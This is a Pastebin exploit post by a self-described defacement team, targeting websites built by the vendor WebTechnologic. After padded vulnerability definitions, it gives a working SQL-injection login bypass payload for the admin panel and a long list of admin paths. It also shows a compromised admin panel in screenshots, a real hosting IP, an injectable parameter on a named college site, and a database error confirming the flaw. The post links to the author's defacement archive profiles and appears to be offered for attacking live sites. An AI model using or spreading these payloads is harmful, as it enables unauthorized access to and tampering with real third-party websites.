Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ####################################################################
- # Exploit Title : WebTechnologic SQL Injection Improper Authentication
- # Author [ Discovered By ] : KingSkrupellos
- # Team : Cyberizm Digital Security Army
- # Date : 03 May 2020
- # Vendor Homepage : webtechnologic.com
- # Tested On : Windows and Linux
- # Category : WebApps
- # Exploit Risk : Medium
- # Vulnerability Type : CWE-287 [ Improper Authentication ]
- CAPEC-115: Authentication Bypass
- CWE-89 [ Improper Neutralization of Special Elements used
- in an SQL Command ('SQL Injection') ]
- # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
- # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
- # Exploit4Arab : exploit4arab.org/author/KingSkrupellos
- # Zone-H : zone-h.org/archive/notifier=KingSkrupellos
- zone-h.org/archive/notifier=CyBeRiZM
- # Mirror-H : mirror-h.org/search/hacker/948/
- mirror-h.org/search/hacker/94/
- mirror-h.org/search/hacker/1826/
- # Defacer.ID : defacer.id/archive/attacker/KingSkrupellos
- defacer.id/archive/team/Cyberizm-Org
- # Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/
- # Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos
- aljyyosh.org/hacker.php?id=Cyberizm.Org
- aljyyosh.org/hacker.php?id=Cyberizm
- # Zone-D : zone-d.org/attacker/id/69
- # Pastebin : pastebin.com/u/KingSkrupellos
- # Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities
- ####################################################################
- # Impact :
- ***********
- CWE-287 [ Improper Authentication ]
- Authentication is any process by which a system verifies the identity of a user who wishes
- to access it.When an actor claims to have a given identity, the software does not
- prove or insufficiently proves that the claim is correct. Improper authentication
- occurs when an application improperly verifies the identity of a user.
- A software incorrectly validates user's login information and as a result, an attacker can
- gain certain privileges within the application or disclose sensitive information that allows
- them to access sensitive data and provoke arbitrary code execution.
- The weakness is introduced during Architecture and Design, Implementation stages.
- CAPEC-115 [ Authentication Bypass ]
- An attacker gains access to application, service, or device with the privileges
- of an authorized or privileged user by evading or circumventing an authentication mechanism.
- The attacker is therefore able to access protected data without authentication ever having taken place.
- This refers to an attacker gaining access equivalent to an authenticated user without ever going
- through an authentication procedure. This is usually the result of the attacker using an unexpected
- access procedure that does not go through the proper checkpoints where authentication should occur.
- For example, a web site might assume that all users will click through a given link in order to get to
- secure material and simply authenticate everyone that clicks the link. However, an attacker might be
- able to reach secured web content by explicitly entering the path to the content rather than clicking
- through the authentication link, thereby avoiding the check entirely. This attack pattern differs from
- other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than
- faking authentication by exploiting flaws or by stealing credentials from legitimate users.
- CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
- Website powered by Car Dealer 5 is prone to an SQL-injection vulnerability because
- it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
- Exploiting this issue could allow an attacker to compromise the application, access or
- modify data, or exploit latent vulnerabilities in the underlying database.
- A remote attacker can send a specially crafted request to the vulnerable application and
- execute arbitrary SQL commands in application`s database. Further exploitation of this
- vulnerability may result in unauthorized data manipulation.
- An attacker can exploit this issue using a browser or with any SQL Injector Tool.
- ####################################################################
- # Authentication Bypass / Improper Authentication / Admin Panel Login Bypass Exploit :
- ******************************************************************************
- /admin/
- Administrator Username : '=''or'
- Administrator Password : '=''or'
- /cust-login/admin_home.php
- /cust-login/TreeCount_Detail.php
- /cust-login/RefIncome_list.php
- /cust-login/BinaryIncome.php
- /cust-login/Income_cust_list.php
- /cust-login/Income_CustHistory_list.php
- /cust-login/Sponser_cust_list.php
- /cust-login/recharge_list.php
- /cust-login/admin_email.php
- /cust-login/change_password.php
- /admin-panel/admin_home.php
- /admin-panel/admin_email.php
- /admin-panel/change_password.php
- /admin-panel/content_list.php
- /admin-panel/News_addf.php
- /admin-panel/News_list.php
- /admin-panel/content_image_addf.php
- /admin-panel/content_image_list.php
- /admin-panel/content_image_addf.php
- /admin-panel/banner_addf.php
- /admin-panel/banner_list.php
- /admin-panel/staff_addf.php
- /admin-panel/staff_list.php
- /admin-panel/testi_addf.php
- /admin-panel/testi_list.php
- /admin-panel/courses_addf.php
- /admin-panel/courses_list.php
- /admin-panel/Album_addf.php
- /admin-panel/Album_list.php
- /admin-panel/Photo_addf.php
- /admin-panel/Photo_list.php
- /admin-panel/vedio_addf.php
- /admin-panel/vedio_list.php
- /admin-panel/email_addf.php
- /admin-panel/mail_temp_addf.php
- /admin-panel/newsletter_list.php
- ScreenShot Administrator Panel :
- https://www.upload.ee/image/11619798/webtechnologicadminpanelscreenshot03052020.png
- https://www.upload.ee/image/11619810/webtechnologic2adminpanelscreenshot03052020.png
- Reverse IP results for (103.21.59.15)
- There are 2,963 domains hosted on this server.
- # SQL Injection Exploit :
- ************************
- /KrishnaCollege_Bijnor.php?pid=[SQL Injection]
- # Example SQL Database Error :
- ******************************
- An Internal Error has Occured.
- Please report following error to the webmaster.
- select * from tbl_content where id='334''
- You have an error in your SQL syntax; check the manual that corresponds
- to your MySQL server version for the right syntax to use near ''334''' at line 1'
- ####################################################################
- # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
- ####################################################################
Add Comment
Please, Sign In to add comment